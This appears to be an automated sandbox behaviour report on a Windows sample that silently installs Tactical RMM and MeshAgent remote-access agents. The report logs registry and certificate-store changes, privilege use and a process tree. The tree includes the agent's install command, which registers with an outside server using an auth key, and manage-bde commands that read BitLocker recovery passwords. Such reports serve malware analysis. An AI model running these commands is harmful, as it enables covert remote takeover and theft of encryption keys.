| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-962 = "Paraguay Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-572 = "China Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2431 = "Cuba Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1892 = "Russia TZ 3 Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-751 = "Tonga Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1471 = "Magadan Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2002 = "Cabo Verde Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Program Files\Mesh Agent\MeshAgent.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-401 = "Arabic Daylight Time" | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 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 | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\2024-10-06_87bda56ec572e8e748aeafba3e75755c_poet-rat_snatch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 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 | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 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 | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 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 | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 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 | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\2024-10-06_87bda56ec572e8e748aeafba3e75755c_poet-rat_snatch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\2024-10-06_87bda56ec572e8e748aeafba3e75755c_poet-rat_snatch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 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 | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4 | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 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 | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 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 | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-QCL73.tmp\tacticalagent-v2.8.0-windows-amd64.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2024-10-06_87bda56ec572e8e748aeafba3e75755c_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-10-06_87bda56ec572e8e748aeafba3e75755c_poet-rat_snatch.exe"
C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe
C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe /VERYSILENT /SUPPRESSMSGBOXES
C:\Users\Admin\AppData\Local\Temp\is-QCL73.tmp\tacticalagent-v2.8.0-windows-amd64.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QCL73.tmp\tacticalagent-v2.8.0-windows-amd64.tmp" /SL5="$702CA,3652845,825344,C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe" /VERYSILENT /SUPPRESSMSGBOXES
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrpc
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\net.exe
net stop tacticalrpc
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tacticalrpc
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c net stop tacticalagent
C:\Windows\SysWOW64\net.exe
net stop tacticalagent
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tacticalagent
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrmm
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\net.exe
net stop tacticalrmm
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tacticalrmm
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM tacticalrmm.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM tacticalrmm.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c sc delete tacticalagent
C:\Windows\SysWOW64\sc.exe
sc delete tacticalagent
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c sc delete tacticalrpc
C:\Windows\SysWOW64\sc.exe
sc delete tacticalrpc
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c tacticalrmm.exe -m installsvc
C:\Program Files\TacticalAgent\tacticalrmm.exe
tacticalrmm.exe -m installsvc
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c net start tacticalrmm
C:\Windows\SysWOW64\net.exe
net start tacticalrmm
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start tacticalrmm
C:\Program Files\TacticalAgent\tacticalrmm.exe
"C:\Program Files\TacticalAgent\tacticalrmm.exe" -m install --api https://api.andvo.ru --client-id 1 --site-id 9 --agent-type workstation --auth 9b1ee2bdfcd29fd46f5c1772d5779c32e8c4a6b87f7ed6246c1a3a07a364ca8b
C:\Program Files\TacticalAgent\meshagent.exe
"C:\Program Files\TacticalAgent\meshagent.exe" -fullinstall
C:\Program Files\Mesh Agent\MeshAgent.exe
"C:\Program Files\Mesh Agent\MeshAgent.exe"
C:\Windows\System32\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\system32\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
C:\Windows\System32\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
C:\Windows\system32\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
C:\Windows\System32\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\System32\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -noprofile -nologo -command -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -noprofile -nologo -command -
C:\Program Files\Mesh Agent\MeshAgent.exe
"C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -noprofile -nologo -command -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -noprofile -nologo -command -
C:\Windows\system32\cmd.exe
/c manage-bde -protectors -get C: -Type recoverypassword
C:\Windows\system32\manage-bde.exe
manage-bde -protectors -get C: -Type recoverypassword
C:\Windows\system32\cmd.exe
/c manage-bde -protectors -get F: -Type recoverypassword
C:\Windows\system32\manage-bde.exe
manage-bde -protectors -get F: -Type recoverypassword
C:\Program Files\TacticalAgent\tacticalrmm.exe
